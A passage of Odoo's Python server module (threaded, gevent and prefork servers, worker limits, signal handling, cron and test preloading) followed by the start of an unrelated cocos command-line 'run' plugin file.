paths_to_watch.append(path)
_logger.info('Watching addons folder %s', path)
self.watcher = InotifyTrees(paths_to_watch, mask=INOTIFY_LISTEN_EVENTS, block_duration_s=.5)
def run(self):
_logger.info('AutoReload watcher running with inotify')
dir_creation_events = set(('IN_MOVED_TO', 'IN_CREATE'))
while self.started:
for event in self.watcher.event_gen(timeout_s=0, yield_nones=False):
(_, type_names, path, filename) = event
if 'IN_ISDIR' not in type_names:
# despite not having IN_DELETE in the watcher's mask, the
# watcher sends these events when a directory is deleted.
if 'IN_DELETE' not in type_names:
full_path = os.path.join(path, filename)
if self.handle_file(full_path):
return
elif dir_creation_events.intersection(type_names):
full_path = os.path.join(path, filename)
for root, _, files in os.walk(full_path):
for file in files:
if self.handle_file(os.path.join(root, file)):
return
def start(self):
self.started = True
self.thread = threading.Thread(target=self.run, name="odoo.service.autoreload.watcher")
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
self.started = False
self.thread.join()
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
self.app = app
# config
self.interface = config['http_interface'] or '0.0.0.0'
self.port = config['http_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
:param sock: the network socket to close
:type sock: socket.socket
"""
try:
sock.shutdown(socket.SHUT_RDWR)
except socket.error as e:
if e.errno == errno.EBADF:
# Werkzeug > 0.9.6 closes the socket itself (see commit
# https://github.com/mitsuhiko/werkzeug/commit/4d8ca089)
return
# On OSX, socket shutdowns both sides if any side closes it
# causing an error 57 'Socket is not connected' on shutdown
# of the other side (or something), see
# http://bugs.python.org/issue4397
# note: stdlib fixed test, not behavior
if e.errno != errno.ENOTCONN or platform.system() not in ['Darwin', 'Windows']:
raise
sock.close()
class ThreadedServer(CommonServer):
def __init__(self, app):
super(ThreadedServer, self).__init__(app)
self.main_thread_id = threading.currentThread().ident
# Variable keeping track of the number of calls to the signal handler defined
# below. This variable is monitored by ``quit_on_signals()``.
self.quit_signals_received = 0
#self.socket = None
self.httpd = None
self.limits_reached_threads = set()
self.limit_reached_time = None
def signal_handler(self, sig, frame):
if sig in [signal.SIGINT, signal.SIGTERM]:
# shutdown on kill -INT or -TERM
self.quit_signals_received += 1
if self.quit_signals_received > 1:
# logging.shutdown was already called at this point.
sys.stderr.write("Forced shutdown.\n")
os._exit(0)
# interrupt run() to start shutdown
raise KeyboardInterrupt()
elif hasattr(signal, 'SIGXCPU') and sig == signal.SIGXCPU:
sys.stderr.write("CPU time limit exceeded! Shutting down immediately\n")
sys.stderr.flush()
os._exit(0)
elif sig == signal.SIGHUP:
# restart on kill -HUP
odoo.phoenix = True
self.quit_signals_received += 1
# interrupt run() to start shutdown
raise KeyboardInterrupt()
def process_limit(self):
memory = memory_info(psutil.Process(os.getpid()))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.warning('Server memory limit (%s) reached.', memory)
self.limits_reached_threads.add(threading.currentThread())
for thread in threading.enumerate():
if not thread.daemon or getattr(thread, 'type', None) == 'cron':
# We apply the limits on cron threads and HTTP requests,
# longpolling requests excluded.
if getattr(thread, 'start_time', None):
thread_execution_time = time.time() - thread.start_time
thread_limit_time_real = config['limit_time_real']
if (getattr(thread, 'type', None) == 'cron' and
config['limit_time_real_cron'] and config['limit_time_real_cron'] > 0):
thread_limit_time_real = config['limit_time_real_cron']
if thread_limit_time_real and thread_execution_time > thread_limit_time_real:
_logger.warning(
'Thread %s virtual real time limit (%d/%ds) reached.',
thread, thread_execution_time, thread_limit_time_real)
self.limits_reached_threads.add(thread)
# Clean-up threads that are no longer alive
# e.g. threads that exceeded their real time,
# but which finished before the server could restart.
for thread in list(self.limits_reached_threads):
if not thread.isAlive():
self.limits_reached_threads.remove(thread)
if self.limits_reached_threads:
self.limit_reached_time = self.limit_reached_time or time.time()
else:
self.limit_reached_time = None
def cron_thread(self, number):
from odoo.addons.base.models.ir_cron import ir_cron
while True:
time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style
registries = odoo.modules.registry.Registry.registries
_logger.debug('cron%d polling for jobs', number)
for db_name, registry in registries.items():
if registry.ready:
thread = threading.currentThread()
thread.start_time = time.time()
try:
ir_cron._acquire_job(db_name)
except Exception:
_logger.warning('cron%d encountered an Exception:', number, exc_info=True)
thread.start_time = None
def cron_spawn(self):
""" Start the above runner function in a daemon thread.
The thread is a typical daemon thread: it will never quit and must be
terminated when the main process exits - with no consequence (the processing
threads it spawns are not marked daemon).
"""
# Force call to strptime just before starting the cron thread
# to prevent time.strptime AttributeError within the thread.
# See: http://bugs.python.org/issue7980
datetime.datetime.strptime('2012-01-01', '%Y-%m-%d')
for i in range(odoo.tools.config['max_cron_threads']):
def target():
self.cron_thread(i)
t = threading.Thread(target=target, name="odoo.service.cron.cron%d" % i)
t.setDaemon(True)
t.type = 'cron'
t.start()
_logger.debug("cron%d started!" % i)
def http_thread(self):
def app(e, s):
return self.app(e, s)
self.httpd = ThreadedWSGIServerReloadable(self.interface, self.port, app)
self.httpd.serve_forever()
def http_spawn(self):
t = threading.Thread(target=self.http_thread, name="odoo.service.httpd")
t.setDaemon(True)
t.start()
def start(self, stop=False):
_logger.debug("Setting signal handlers")
set_limit_memory_hard()
if os.name == 'posix':
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGXCPU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
elif os.name == 'nt':
import win32api
win32api.SetConsoleCtrlHandler(lambda sig: self.signal_handler(sig, None), 1)
test_mode = config['test_enable'] or config['test_file']
if test_mode or (config['http_enable'] and not stop):
# some tests need the http deamon to be available...
self.http_spawn()
def stop(self):
""" Shutdown the WSGI server. Wait for non deamon threads.
"""
if getattr(odoo, 'phoenix', None):
_logger.info("Initiating server reload")
else:
_logger.info("Initiating shutdown")
_logger.info("Hit CTRL-C again or send a second signal to force the shutdown.")
stop_time = time.time()
if self.httpd:
self.httpd.shutdown()
# Manually join() all threads before calling sys.exit() to allow a second signal
# to trigger _force_quit() in case some non-daemon threads won't exit cleanly.
# threading.Thread.join() should not mask signals (at least in python 2.5).
me = threading.currentThread()
_logger.debug('current thread: %r', me)
for thread in threading.enumerate():
_logger.debug('process %r (%r)', thread, thread.isDaemon())
if (thread != me and not thread.isDaemon() and thread.ident != self.main_thread_id and
thread not in self.limits_reached_threads):
while thread.isAlive() and (time.time() - stop_time) < 1:
# We wait for requests to finish, up to 1 second.
_logger.debug('join and sleep')
# Need a busyloop here as thread.join() masks signals
# and would prevent the forced shutdown.
thread.join(0.05)
time.sleep(0.05)
_logger.debug('--')
logging.shutdown()
def run(self, preload=None, stop=False):
""" Start the http server and the cron thread then wait for a signal.
The first SIGINT or SIGTERM signal will initiate a graceful shutdown while
a second one if any will force an immediate exit.
"""
self.start(stop=stop)
rc = preload_registries(preload)
if stop:
self.stop()
return rc
self.cron_spawn()
# Wait for a first signal to be handled. (time.sleep will be interrupted
# by the signal handler)
try:
while self.quit_signals_received == 0:
self.process_limit()
if self.limit_reached_time:
has_other_valid_requests = any(
not t.daemon and
t not in self.limits_reached_threads
for t in threading.enumerate()
if getattr(t, 'type', None) == 'http')
if (not has_other_valid_requests or
(time.time() - self.limit_reached_time) > SLEEP_INTERVAL):
# We wait there is no processing requests
# other than the ones exceeding the limits, up to 1 min,
# before asking for a reload.
_logger.info('Dumping stacktrace of limit exceeding threads before reloading')
dumpstacks(thread_idents=[thread.ident for thread in self.limits_reached_threads])
self.reload()
# `reload` increments `self.quit_signals_received`
# and the loop will end after this iteration,
# therefore leading to the server stop.
# `reload` also sets the `phoenix` flag
# to tell the server to restart the server after shutting down.
else:
time.sleep(1)
else:
time.sleep(SLEEP_INTERVAL)
except KeyboardInterrupt:
pass
self.stop()
def reload(self):
os.kill(self.pid, signal.SIGHUP)
class GeventServer(CommonServer):
def __init__(self, app):
super(GeventServer, self).__init__(app)
self.port = config['longpolling_port']
self.httpd = None
def process_limits(self):
restart = False
if self.ppid != os.getppid():
_logger.warning("LongPolling Parent changed", self.pid)
restart = True
memory = memory_info(psutil.Process(self.pid))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.warning('LongPolling virtual memory limit reached: %s', memory)
restart = True
if restart:
# suicide !!
os.kill(self.pid, signal.SIGTERM)
def watchdog(self, beat=4):
import gevent
self.ppid = os.getppid()
while True:
self.process_limits()
gevent.sleep(beat)
def start(self):
import gevent
try:
from gevent.pywsgi import WSGIServer, WSGIHandler
except ImportError:
from gevent.wsgi import WSGIServer, WSGIHandler
class ProxyHandler(WSGIHandler):
""" When logging requests, try to get the client address from
the environment so we get proxyfix's modifications (if any).
Derived from werzeug.serving.WSGIRequestHandler.log
/ werzeug.serving.WSGIRequestHandler.address_string
"""
def format_request(self):
old_address = self.client_address
if getattr(self, 'environ', None):
self.client_address = self.environ['REMOTE_ADDR']
elif not self.client_address:
self.client_address = '<local>'
# other cases are handled inside WSGIHandler
try:
return super().format_request()
finally:
self.client_address = old_address
set_limit_memory_hard()
if os.name == 'posix':
# Set process memory limit as an extra safeguard
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
gevent.spawn(self.watchdog)
self.httpd = WSGIServer(
(self.interface, self.port), self.app,
log=logging.getLogger('longpolling'),
error_log=logging.getLogger('longpolling'),
handler_class=ProxyHandler,
)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
try:
self.httpd.serve_forever()
except:
_logger.exception("Evented Service (longpolling): uncaught error during main loop")
raise
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self, preload, stop):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
method between workers but we plan to replace it by a more intelligent
dispatcher to will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = config['http_enable'] and \
(config['http_interface'] or '0.0.0.0', config['http_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
self.cron_timeout = config['limit_time_real_cron'] or None
if self.cron_timeout == -1:
self.cron_timeout = self.timeout
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], b'.')
except IOError as e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv()
cmd = [sys.executable, sys.argv[0], 'gevent'] + nargs[1:]
popen = subprocess.Popen(cmd)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid == self.long_polling_pid:
self.long_polling_pid = None
if pid in self.workers:
_logger.debug("Worker (%s) unregistered", pid)
try:
self.workers_http.pop(pid, None)
self.workers_cron.pop(pid, None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError as e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT, signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
odoo.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
dumpstacks()
elif sig == signal.SIGUSR1:
# log ormcache stats on kill -SIGUSR1
log_ormcache_stats()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError as e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if worker.watchdog_timeout is not None and \
(now - worker.watchdog_time) >= worker.watchdog_timeout:
_logger.error("%s (%s) timeout after %ss",
worker.__class__.__name__,
pid,
worker.watchdog_timeout)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
if config['http_enable']:
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
if not self.long_polling_pid:
self.long_polling_spawn()
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
def sleep(self):
try:
# map of fd -> worker
fds = {w.watchdog_pipe[0]: w for w in self.workers.values()}
fd_in = list(fds) + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
empty_pipe(fd)
except select.error as e:
if e.args[0] not in [errno.EINTR]:
raise
def start(self):
# wakeup pipe, python doesnt throw EINTR when a syscall is interrupted
# by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
signal.signal(signal.SIGUSR1, log_ormcache_stats)
if self.address:
# listen to socket
_logger.info('HTTP service (werkzeug) running on %s:%s', *self.address)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8 * self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
# FIXME make longpolling process handle SIGTERM correctly
self.worker_kill(self.long_polling_pid, signal.SIGKILL)
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers:
self.worker_kill(pid, signal.SIGINT)
while self.workers and time.time() < limit:
try:
self.process_signals()
except KeyboardInterrupt:
_logger.info("Forced shutdown.")
break
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers:
self.worker_kill(pid, signal.SIGTERM)
if self.socket:
self.socket.close()
def run(self, preload, stop):
self.start()
rc = preload_registries(preload)
if stop:
self.stop()
return rc
# Empty the cursor pool, we dont want them to be shared among forked workers.
odoo.sql_db.close_all()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception as e:
_logger.exception(e)
self.stop(False)
return -1
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
self.eintr_pipe = multi.pipe_new()
self.wakeup_fd_r, self.wakeup_fd_w = self.eintr_pipe
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('odoo: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
os.close(self.eintr_pipe[0])
os.close(self.eintr_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def signal_time_expired_handler(self, n, stack):
# TODO: print actual RUSAGE_SELF (since last check_limits) instead of
# just repeating the config setting
_logger.info('Worker (%d) CPU time limit (%s) reached.', self.pid, config['limit_time_cpu'])
# We dont suicide in such case
raise Exception('CPU time limit exceeded.')
def sleep(self):
try:
select.select([self.multi.socket, self.wakeup_fd_r], [], [], self.multi.beat)
# clear wakeup pipe if we were interrupted
empty_pipe(self.wakeup_fd_r)
except select.error as e:
if e.args[0] not in [errno.EINTR]:
raise
def check_limits(self):
# If our parent changed sucide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
memory = memory_info(psutil.Process(os.getpid()))
if config['limit_memory_soft'] and memory > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, memory)
self.alive = False # Commit suicide after the request.
set_limit_memory_hard()
# update RLIMIT_CPU so limit_time_cpu applies per unit of work
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
if self.multi.socket:
# Prevent fd inheritance: close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGXCPU, self.signal_time_expired_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGHUP, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
signal.signal(signal.SIGTTIN, signal.SIG_DFL)
signal.signal(signal.SIGTTOU, signal.SIG_DFL)
signal.set_wakeup_fd(self.wakeup_fd_w)
def stop(self):
pass
def run(self):
try:
self.start()
t = threading.Thread(name="Worker %s (%s) workthread" % (self.__class__.__name__, self.pid), target=self._runloop)
t.daemon = True
t.start()
t.join()
_logger.info("Worker (%s) exiting. request_count: %s, registry count: %s.",
self.pid, self.request_count,
len(odoo.modules.registry.Registry.registries))
self.stop()
except Exception:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
def _runloop(self):
signal.pthread_sigmask(signal.SIG_BLOCK, {
signal.SIGXCPU,
signal.SIGINT, signal.SIGQUIT, signal.SIGUSR1,
})
try:
while self.alive:
self.check_limits()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
if not self.alive:
break
self.process_work()
except:
_logger.exception("Worker %s (%s) Exception occured, exiting...", self.__class__.__name__, self.pid)
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def __init__(self, multi):
super(WorkerHTTP, self).__init__(multi)
# The ODOO_HTTP_SOCKET_TIMEOUT environment variable allows to control socket timeout for
# extreme latency situations. It's generally better to use a good buffering reverse proxy
# to quickly free workers rather than increasing this timeout to accomodate high network
# latencies & b/w saturation. This timeout is also essential to protect against accidental
# DoS due to idle HTTP connections.
sock_timeout = os.environ.get("ODOO_HTTP_SOCKET_TIMEOUT")
self.sock_timeout = float(sock_timeout) if sock_timeout else 2
def process_request(self, client, addr):
client.setblocking(1)
client.settimeout(self.sock_timeout)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client, addr)
except IOError as e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error as e:
if e.errno not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
self.watchdog_timeout = multi.cron_timeout # Use a distinct value for CRON Worker
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
# simulate interruptible sleep with select(wakeup_fd, timeout)
try:
select.select([self.wakeup_fd_r], [], [], interval)
# clear wakeup pipe if we were interrupted
empty_pipe(self.wakeup_fd_r)
except select.error as e:
if e.args[0] != errno.EINTR:
raise
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = odoo.service.db.list_dbs(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('odoo.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_memory = memory_info(psutil.Process(os.getpid()))
from odoo.addons import base
base.models.ir_cron.ir_cron._acquire_job(db_name)
# dont keep cursors in multi database mode
if len(db_names) > 1:
odoo.sql_db.close_db(db_name)
if rpc_request_flag:
run_time = time.time() - start_time
end_memory = memory_info(psutil.Process(os.getpid()))
vms_diff = (end_memory - start_memory) / 1024
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
(db_name, run_time, start_memory / 1024, end_memory / 1024, vms_diff)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
if self.multi.socket:
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
server_wide_modules = {'base', 'web'} | set(odoo.conf.server_wide_modules)
for m in server_wide_modules:
try:
odoo.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if odoo.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
if updated_modules:
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
# We should keep the LISTEN_* environment variabled in order to support socket activation on reexec
os.execve(sys.executable, args, os.environ)
def load_test_file_py(registry, test_file):
threading.currentThread().testing = True
try:
test_path, _ = os.path.splitext(os.path.abspath(test_file))
for mod in [m for m in get_modules() if '/%s/' % m in test_file]:
for mod_mod in get_test_modules(mod):
mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
if test_path == mod_path:
suite = unittest.TestSuite()
for t in unittest.TestLoader().loadTestsFromModule(mod_mod):
suite.addTest(t)
_logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
result = odoo.modules.module.OdooTestRunner().run(suite)
success = result.wasSuccessful()
if hasattr(registry._assertion_report,'report_result'):
registry._assertion_report.report_result(success)
if not success:
_logger.error('%s: at least one error occurred in a test', test_file)
return
finally:
threading.currentThread().testing = False
def preload_registries(dbnames):
""" Preload a registries, possibly run a test file."""
# TODO: move all config checks to args dont check tools.config here
dbnames = dbnames or []
rc = 0
for dbname in dbnames:
try:
update_module = config['init'] or config['update']
registry = Registry.new(dbname, update_module=update_module)
# run test_file if provided
if config['test_file']:
test_file = config['test_file']
if not os.path.isfile(test_file):
_logger.warning('test file %s cannot be found', test_file)
elif not test_file.endswith('py'):
_logger.warning('test file %s is not a python file', test_file)
else:
_logger.info('loading test file %s', test_file)
with odoo.api.Environment.manage():
load_test_file_py(registry, test_file)
# run post-install tests
if config['test_enable']:
t0 = time.time()
t0_sql = odoo.sql_db.sql_counter
module_names = (registry.updated_modules if update_module else
registry._init_modules)
_logger.info("Starting post tests")
with odoo.api.Environment.manage():
for module_name in module_names:
result = run_unit_tests(module_name, position='post_install')
registry._assertion_report.record_result(result)
_logger.info("All post-tested in %.2fs, %s queries",
time.time() - t0, odoo.sql_db.sql_counter - t0_sql)
if registry._assertion_report.failures:
rc += 1
except Exception:
_logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
return -1
return rc
def start(preload=None, stop=False):
""" Start the odoo http server and cron processor.
"""
global server
load_server_wide_modules()
odoo.service.wsgi_server._patch_xmlrpc_marshaller()
if odoo.evented:
server = GeventServer(odoo.service.wsgi_server.application)
elif config['workers']:
if config['test_enable'] or config['test_file']:
_logger.warning("Unit testing in workers mode could fail; use --workers 0.")
server = PreforkServer(odoo.service.wsgi_server.application)
# Workaround for Python issue24291, fixed in 3.6 (see Python issue26721)
if sys.version_info[:2] == (3,5):
# turn on buffering also for wfile, to avoid partial writes (Default buffer = 8k)
werkzeug.serving.WSGIRequestHandler.wbufsize = -1
else:
if platform.system() == "Linux" and sys.maxsize > 2**32 and "MALLOC_ARENA_MAX" not in os.environ:
# glibc's malloc() uses arenas [1] in order to efficiently handle memory allocation of multi-threaded
# applications. This allows better memory allocation handling in case of multiple threads that
# would be using malloc() concurrently [2].
# Due to the python's GIL, this optimization have no effect on multithreaded python programs.
# Unfortunately, a downside of creating one arena per cpu core is the increase of virtual memory
# which Odoo is based upon in order to limit the memory usage for threaded workers.
# On 32bit systems the default size of an arena is 512K while on 64bit systems it's 64M [3],
# hence a threaded worker will quickly reach it's default memory soft limit upon concurrent requests.
# We therefore set the maximum arenas allowed to 2 unless the MALLOC_ARENA_MAX env variable is set.
# Note: Setting MALLOC_ARENA_MAX=0 allow to explicitely set the default glibs's malloc() behaviour.
#
# [1] https://sourceware.org/glibc/wiki/MallocInternals#Arenas_and_Heaps
# [2] https://www.gnu.org/software/libc/manual/html_node/The-GNU-Allocator.html
# [3] https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=00ce48c;hb=0a8262a#l862
try:
import ctypes
libc = ctypes.CDLL("libc.so.6")
M_ARENA_MAX = -8
assert libc.mallopt(ctypes.c_int(M_ARENA_MAX), ctypes.c_int(2))
except Exception:
_logger.warning("Could not set ARENA_MAX through mallopt()")
server = ThreadedServer(odoo.service.wsgi_server.application)
watcher = None
if 'reload' in config['dev_mode'] and not odoo.evented:
if inotify:
watcher = FSWatcherInotify()
watcher.start()
elif watchdog:
watcher = FSWatcherWatchdog()
watcher.start()
else:
if os.name == 'posix' and platform.system() != 'Darwin':
module = 'inotify'
else:
module = 'watchdog'
_logger.warning("'%s' module not installed. Code autoreload feature is disabled", module)
if 'werkzeug' in config['dev_mode']:
server.app = DebuggedApplication(server.app, evalex=True)
rc = server.run(preload, stop)
if watcher:
watcher.stop()
# like the legend of the phoenix, all ends with beginnings
if getattr(odoo, 'phoenix', False):
_reexec()
return rc if rc else 0
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
|
project_run.py
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Authr: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
import BaseHTTPServer
import webbrowser
import threading
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return "Compiles & deploy project and then runs it on the target"
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help="Set the run mode, should be debug|release, default is debug.")
group = parser.add_argument_group("web project arguments")
group.add_argument("-b", "--browser", dest="browser",
help="Specify the browser to open the url. Use the system default browser if not specified.")
group.add_argument("port", metavar="SERVER_PORT", nargs='?', default='8000',
help="Set the port of the local web server, defualt is 8000")
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help="Set the host of the local web server, defualt is 127.0.0.1")
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
